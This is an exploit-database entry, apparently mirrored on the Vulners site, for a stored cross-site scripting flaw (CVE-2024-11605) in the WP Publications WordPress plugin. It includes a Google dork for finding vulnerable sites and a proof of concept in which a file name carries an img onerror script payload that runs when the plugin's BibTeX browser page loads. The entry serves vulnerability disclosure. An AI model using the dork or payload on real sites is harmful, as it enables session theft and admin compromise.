Vulners
Lucene search
📄 WordPress WP Publications 1.2 Cross Site Scripting
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2024-11605 | 27 Dec 202406:11 | – | circl |
 | WordPress plugin wp-publications 安全漏洞 | 27 Dec 202400:00 | – | cnnvd |
 | WordPress plugin wp-publications cross-site scripting vulnerability | 3 Jan 202500:00 | – | cnvd |
 | CVE-2024-11605 | 27 Dec 202406:00 | – | cve |
 | CVE-2024-11605 WP Publications <= 1.2 - Admin+ Stored XSS | 27 Dec 202406:00 | – | cvelist |
 | WP Publications WordPress Plugin 1.2 - Stored XSS | 16 Jul 202500:00 | – | exploitdb |
 | CVE-2024-11605 | 27 Dec 202406:15 | – | nvd |
 | WordPress WP Publications plugin <= 1.2 - Admin+ Stored XSS vulnerability | 27 Dec 202406:41 | – | patchstack |
 | PT-2024-17132 · WordPress · Wp-Publications | 27 Dec 202400:00 | – | ptsecurity |
 | CVE-2024-11605 | 23 May 202506:37 | – | redhatcve |
10
# Exploit Title: WP Publications WordPress Plugin 1.2 - Stored XSS
# Google Dork: inurl:/wp-content/plugins/wp-publications/
# Date: 2025-07-15
# Exploit Author: Zeynalxan Quliyev
# Vendor Homepage: https://wordpress.org/plugins/wp-publications/
# Software Link: https://downloads.wordpress.org/plugin/wp-publications.1.2.zip
# Version: <= 1.2
# Tested on: WordPress 6.5.3 / Linux (Apache)
# CVE: CVE-2024-11605
## Vulnerability Details
The WP Publications plugin for WordPress (versions <= 1.2) is vulnerable to a **Stored Cross-Site Scripting (XSS)** attack. The vulnerability exists because the plugin fails to escape filenames before outputting them in the HTML, allowing high-privileged users (such as admins) to inject arbitrary JavaScript code.
This vulnerability is exploitable even in WordPress configurations where the `unfiltered_html` capability is disabled (e.g., multisite setups).
---
## Proof of Concept (PoC)
1. SSH into the server and navigate to the plugin directory:
```bash
cd /var/www/html/wp-content/plugins/wp-publications/
```
2. Run the following command to create a malicious BibTeX file:
```bash
touch "<img src=x onerror=alert('XSS')>.bib"
```
3. Access the plugin's BibTeX browser via the following URL:
```
https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib=
```
4. The injected JavaScript will be executed, triggering the XSS payload:
```javascript
alert('XSS');
```
---
## Impact
* Stored XSS (JavaScript) is executed in the context of the admin panel.
* Bypasses `unfiltered_html` protection in multisite environments.
* Can be used for privilege escalation, cookie theft, or injecting malicious content.
---
## Recommendation
Update to a version of the plugin that properly escapes file names before rendering them in the output. If no update is available, disable the plugin or sanitize file inputs manually.
---
## References
* [CVE-2024-11605 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-11605)
* [WP Plugin Page](https://wordpress.org/plugins/wp-publications/)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jul 2025 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.14.8
EPSS0.02745
SSVC